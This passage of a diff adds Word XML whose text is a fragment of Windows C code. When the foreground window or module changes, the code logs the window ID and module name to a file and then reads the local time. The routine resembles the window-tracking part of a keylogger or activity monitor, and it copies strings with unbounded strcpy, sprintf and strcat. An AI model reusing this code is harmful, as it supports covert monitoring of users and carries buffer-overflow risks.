+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>prevWinID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> || </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>prevModuleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>prevWinID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>prevModuleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sprintf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), " : %d", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, "\r\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WriteFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>moduleName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>), &amp;written, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GetLocalTime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>st</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
